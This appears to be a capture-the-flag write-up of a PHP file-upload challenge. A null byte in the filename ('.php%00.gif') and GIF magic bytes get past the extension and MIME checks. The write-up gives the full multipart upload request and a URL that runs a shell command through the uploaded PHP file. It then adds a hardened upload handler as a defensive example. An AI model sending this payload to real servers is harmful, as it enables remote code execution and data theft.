Given this code:
```
// Extension and MIME type are checked against the full, untruncated path.
$extension = strtolower(pathinfo($target_dir, PATHINFO_EXTENSION));
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$type = finfo_file($finfo, $files["tmp_name"]);
finfo_close($finfo);
if ($extension != "gif" || strpos($type, "image/gif") === false) {
    echo " Sorry, only gif files are accepted";
    $uploadOk = false;
}
// The path is cut at the first null byte only after validation has passed.
$target_dir = strtok($target_dir, chr(0));
if ($uploadOk && move_uploaded_file($files["tmp_name"], $target_dir)) {
    echo "uploaded gif here go see it!";
}
```
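We can upload a `.php` file by sending a file that:
- has `.gif` as the final extension of its filename
- contains the GIF magic bytes (GIF87a/GIF89a) at the beginning
- has a null byte between `.php` and `.gif` in its filename

The extension and MIME checks run on the full name, which ends in `.gif`; `strtok` then cuts the path at the null byte, so the file is saved with a `.php` extension.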
```
POST / HTTP/1.1
Host: 52.59.124.14:10021
Content-Type: multipart/form-data; boundary=---------------------------1013956662279462726520057537
Content-Length: 398

-----------------------------1013956662279462726520057537
Content-Disposition: form-data; name="fileToUpload"; filename="weweweww.php%00.gif"
Content-Type: application/octet-stream

GIF87a
-----------------------------1013956662279462726520057537
Content-Disposition: form-data; name="submit"

Upload
-----------------------------1013956662279462726520057537--
```
Then open `http://52.59.124.14:10021/images/weweweww.php?c=cat%20../flag*` to get the flag.
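
A hardened form of the handler above, as an added example that is not part of the original writeup or the challenge's code. The function name `store_gif_upload` and the parameter `$upload_root` are hypothetical; `$files` is assumed to be one entry of `$_FILES`, as in the snippet above.

```php
<?php
// Added example: hardened upload handler. store_gif_upload() and
// $upload_root are hypothetical names, not the challenge's code.
declare(strict_types=1);

function store_gif_upload(array $files, string $upload_root): ?string
{
    // Reject failed uploads and anything PHP did not receive via HTTP POST.
    if (($files['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($files['tmp_name'])) {
        return null;
    }

    // Refuse names with control bytes instead of truncating them, so the
    // string that is validated is never altered after validation.
    $client_name = (string) ($files['name'] ?? '');
    if (preg_match('/[\x00-\x1f\x7f]/', $client_name) === 1) {
        return null;
    }
    if (strtolower(pathinfo($client_name, PATHINFO_EXTENSION)) !== 'gif') {
        return null;
    }

    // Content check: require an exact MIME match, not a substring match.
    $type = (new finfo(FILEINFO_MIME_TYPE))->file($files['tmp_name']);
    if ($type !== 'image/gif') {
        return null;
    }

    // The stored name is generated server-side with a fixed extension;
    // no part of the client-supplied name reaches the filesystem path.
    $stored = bin2hex(random_bytes(16)) . '.gif';
    $dest = rtrim($upload_root, '/') . '/' . $stored;

    return move_uploaded_file($files['tmp_name'], $dest) ? $stored : null;
}
```

The magic-byte check alone does not stop script content placed after the GIF header, so the fixed `.gif` extension is what keeps the stored file from being executed. The upload directory should also be served with script execution disabled.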